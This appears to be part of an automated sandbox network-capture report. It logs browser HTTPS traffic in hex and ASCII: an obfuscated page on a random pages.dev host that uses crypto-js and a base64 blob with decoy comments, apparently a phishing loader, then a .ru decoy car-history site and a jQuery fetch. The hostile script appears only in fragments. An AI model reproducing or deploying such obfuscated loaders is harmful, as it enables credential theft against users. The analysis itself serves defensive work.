                                                                Data Ascii: bw04DBhAOnqiIXf6Oe3anhforIrGxmivO8QFIVdvc1zKGS8jXvFMKOVF9GZbdHapDQMQs9dOpvd9ujK6q1461WtqDwyY3UNhFwcglQghVPY\/iSKFwsbr8VVIxE12WnlGDM\/FL0Nrft1p9VjY5NAEBphMRly7T+fETXS+89R7cO5nej\/X0pO04RF5YR3M6qbi4x2DYyRlDmx4woJHO50KC5AfKD8D2bM7Uh3yP9cO8S5+gxl\/oUwut5302UH


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.1649743172.66.47.1114433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:38 UTC397OUTGET /favicon.ico HTTP/1.1
                                                                Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:39 UTC792INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:03:39 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=0, must-revalidate
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                x-content-type-options: nosniff
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cSBrN%2B19fPVtpDMM%2BkLY%2Fcm5CKHcv5FCHCwCfGv9JqYaDWK%2FgbXuF9TtVx%2FNYGSYk7l9UqfrgY6rpZ1sfL3Mz0A08kcnSlQkiI20M7t4lM42vABddc80Ee15lX3vQ3KJ7pgVxxURNIaOudblX%2Ff%2Bxx0WDL54O9sdRWtSpcgRAzVDbLibk%2BIdlJclmgw%2FGfxEOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9dfac0bd06433d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:03:39 UTC1369INData Raw: 31 37 33 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e e2 81 a4 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e
                                                                Data Ascii: 1736<html> <head> <title></title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.
                                                                2024-08-27 18:03:39 UTC1369INData Raw: 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 20 30 2e 35 2c 20 30 2c 20 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 40 6b 65 79 66 72 61 6d 65 73 20 63 61 6c 2d 62 6f 75 6e 63 65 20 7b 30 25 2c 20 31 30 30 25 2c 20 31 36 2e 35 25 2c 20 37 36 2e 31 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 31 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 32 38 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 33 39 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 33 31 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 2e 30 35 29 3b 7d 33 33 25 20 7b
                                                                Data Ascii: tion: cubic-bezier(0, 0.5, 0, 1);transform: translateY(51px) scaleY(1);}@keyframes cal-bounce {0%, 100%, 16.5%, 76.1% {transform: translateY(151px) scaleY(1);}28% {transform: translateY(39px) scaleY(1);}31% {transform: translateY(51px) scaleY(1.05);}33% {
                                                                2024-08-27 18:03:39 UTC1369INData Raw: 72 61 6d 65 73 20 63 6c 6f 73 65 64 2d 66 6c 61 70 2d 73 77 69 6e 67 20 7b 30 25 2c 20 31 30 30 25 2c 20 37 37 25 2c 20 38 2e 35 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61 74 65 33 64 28 31 2c 20 30 2c 20 30 2c 20 30 29 3b 7d 31 34 2e 35 25 2c 20 37 36 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61 74 65 33 64 28 31 2c 20 30 2c 20 30 2c 20 39 30 64 65 67 29 3b 7d 7d 23 62 61 63 6b 64 72 6f 70 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 20 31 30 37 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 7d 2e 6c 61 63 6f 6e 69 63 20 7b 77 69 64 74 68 3a 20 39 36 70 78 3b 68 65 69 67 68 74 3a 20 39 36 70 78
                                                                Data Ascii: rames closed-flap-swing {0%, 100%, 77%, 8.5% {transform: translateY(-71px) rotate3d(1, 0, 0, 0);}14.5%, 76% {transform: translateY(-71px) rotate3d(1, 0, 0, 90deg);}}#backdrop {width: 130px;height: 107px;overflow: hidden;}.laconic {width: 96px;height: 96px
                                                                2024-08-27 18:03:39 UTC1369INData Raw: 72 65 22 3e 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 64 72 6f 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 63 6f 6e 69 63 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0d 0a 09 3c 21 2d 2d 20 3c 73 70 61 6e 3e 4c 69 66 65 e2 80 99 73 20 6a 6f 75 72 6e 65 79 20 69 73 20 62 65 73 74 20 65 78 70 65 72 69 65 6e 63 65 64 20 62 65 68 69 6e 64 20 74 68 65 20 77 68 65 65 6c 2e 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0d 0a 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 6c 61 62 6f 72 65 64 28 79 61 63 68 74 69 6e 67 29 20 7b 20 3c 21 2d 2d 20 44 72 69 76 69 6e 67 20 69 73 20 74 68 65 20 72 68 79 74 68 6d 20 6f 66 20 6c 69 66 65 20 69 6e 20 6d 6f 74 69 6f 6e 2e 20 2d
                                                                Data Ascii: re"><div id="backdrop"><div class="laconic"></div></div></div></div>... <span>Lifes journey is best experienced behind the wheel.</span> --> </body><script> async function labored(yachting) { ... Driving is the rhythm of life in motion. -
                                                                2024-08-27 18:03:39 UTC474INData Raw: 7a 4f 44 56 6a 5a 57 49 32 4d 47 51 79 4e 32 46 6d 59 6a 41 35 4d 6a 4d 78 59 7a 52 6b 5a 44 45 34 4e 7a 6b 7a 4e 6a 46 6d 59 7a 51 34 5a 44 56 69 4f 54 64 6b 4d 6a 63 30 4d 54 4d 30 4d 6d 4a 6a 4e 54 42 6b 4d 44 41 33 4f 54 64 6d 4e 7a 4e 68 4f 54 42 6d 4d 6a 46 6c 4d 57 49 32 5a 54 51 79 4e 57 4d 30 4e 6a 67 77 4e 57 4d 32 4d 6a 45 79 4f 44 45 30 4e 32 4e 6c 4f 47 56 6d 59 57 55 31 4f 54 68 6d 4e 32 55 32 4d 44 49 31 5a 54 68 6d 49 69 77 69 5a 43 49 36 49 6a 5a 68 4e 6a 45 32 59 7a 5a 6d 4e 7a 41 33 4f 53 4a 39 60 29 29 2c 20 7b 20 3c 21 2d 2d 20 44 72 69 76 69 6e 67 20 69 73 20 61 20 63 6f 6e 76 65 72 73 61 74 69 6f 6e 20 62 65 74 77 65 65 6e 20 79 6f 75 20 61 6e 64 20 74 68 65 20 72 6f 61 64 2e 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d
                                                                Data Ascii: zODVjZWI2MGQyN2FmYjA5MjMxYzRkZDE4NzkzNjFmYzQ4ZDViOTdkMjc0MTM0MmJjNTBkMDA3OTdmNzNhOTBmMjFlMWI2ZTQyNWM0NjgwNWM2MjEyODE0N2NlOGVmYWU1OThmN2U2MDI1ZThmIiwiZCI6IjZhNjE2YzZmNzA3OSJ9`)), { ... Driving is a conversation between you and the road. --> m
                                                                2024-08-27 18:03:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.1649744172.67.181.394433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:42 UTC340OUTGET // HTTP/1.1
                                                                Host: glansaolksnu.ru
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:42 UTC651INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:03:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-powered-by: PHP/7.3.33
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hU3FbQwmCbpBS95KOCJdRRkhZWcl51qkxMQOm38arTrQFH8BFdVh%2FScsNOGDGFV82TFuFUmq28g8JkXXFYDBwhFlZbSP9c3NSkOZYNtQ0YjHOcVWckWfv5nlzxm3l7sEOMc%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9dfad48e2c437b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:03:42 UTC718INData Raw: 31 61 64 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 75 74 6f 6d 6f 62 69 6c 65 20 48 69 73 74 6f 72 79 20 46 61 6e 73 20 2d 20 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74
                                                                Data Ascii: 1adf<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Automobile History Fans - glansaolksnu.ru</title> <link href="https://cdn.jsdelivr.net
                                                                2024-08-27 18:03:42 UTC1369INData Raw: 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 35 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 65 6e 74 2d 73 65 63 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 34 33 61 34 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: color: white; padding: 150px 0; text-align: center; } .content-section { padding: 60px 0; } .footer { background: #343a40; color: white;
                                                                2024-08-27 18:03:42 UTC1369INData Raw: 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 61 62 6f 75 74 22 3e 41 62 6f 75 74 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 73 65 72 76 69 63 65 73 22 3e 53 65 72 76 69 63 65 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: nav-link" href="https://glansaolksnu.ru/#about">About</a> </li> <li class="nav-item"> <a class="nav-link" href="https://glansaolksnu.ru/#services">Services</a> </li>
                                                                2024-08-27 18:03:42 UTC1369INData Raw: 62 64 22 3e 5b 65 6d 61 69 6c 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 20 6f 72 20 63 61 6c 6c 20 75 73 20 61 74 20 37 37 37 2d 35 31 39 2d 31 36 35 35 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 71 75 6f 74 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 30 22 3e 43 61 72 73 20 61 72 65 20 74 68 65 20 73 63 75 6c 70 74 75 72 65 73 20 6f 66 20 6f 75 72 20 65 76 65 72 79 64 61 79 20 6c 69 76 65 73 2e 20 2d 20 43 68 72 69 73 20 42 61 6e 67 6c 65 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 6c 6f 63 6b 71 75 6f 74 65 3e 0d 0a 20
                                                                Data Ascii: bd">[email&#160;protected]</span></a> or call us at 777-519-1655.</p> <blockquote class="blockquote"> <p class="mb-0">Cars are the sculptures of our everyday lives. - Chris Bangle</p> </blockquote>
                                                                2024-08-27 18:03:42 UTC1369INData Raw: 72 63 61 72 73 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 65 78 74 22 3e 45 78 70 6c 6f 72 65 20 74 68 65 20 6c 61 74 65 73 74 20 61 6e 64 20 67 72 65 61 74 65 73 74 20 69 6e 20 73 75 70 65 72 63 61 72 20 74 65 63 68 6e 6f 6c 6f 67 79 2c 20 70 65 72 66 6f 72 6d 61 6e 63 65 2c 20 61 6e 64 20 64 65 73 69 67 6e 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 6d 6f 64 65 72 6e 2d 73 75 70 65 72 63 61 72 73 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 52 65 61 64 20 4d 6f 72 65 3c 2f 61
                                                                Data Ascii: rcars</h5> <p class="card-text">Explore the latest and greatest in supercar technology, performance, and design.</p> <a href="https://glansaolksnu.ru/#modern-supercars" class="btn btn-primary">Read More</a
                                                                2024-08-27 18:03:42 UTC693INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 74 65 72 6d 73 22 3e 54 65 72 6d 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6c 61 6e 73 61 6f 6c 6b 73 6e 75 2e 72 75 2f 23 66 61 71 22 3e 46 41 51 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a
                                                                Data Ascii: <li class="list-inline-item"> <a href="https://glansaolksnu.ru/#terms">Terms</a> </li> <li class="list-inline-item"> <a href="https://glansaolksnu.ru/#faq">FAQ</a> </li>
                                                                2024-08-27 18:03:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.1649746151.101.66.1374433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:42 UTC668OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                Host: code.jquery.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:42 UTC612INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 89501
                                                                Server: nginx
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                ETag: "28feccc0-15d9d"
                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Via: 1.1 varnish, 1.1 varnish
                                                                Accept-Ranges: bytes
                                                                Age: 973605
                                                                Date: Tue, 27 Aug 2024 18:03:42 GMT
                                                                X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740033-EWR
                                                                X-Cache: HIT, HIT
                                                                X-Cache-Hits: 5889, 0
                                                                X-Timer: S1724781822.236383,VS0,VE1
                                                                Vary: Accept-Encoding
                                                                2024-08-27 18:03:42 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                2024-08-27 18:03:42 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                2024-08-27 18:03:42 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                2024-08-27 18:03:42 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
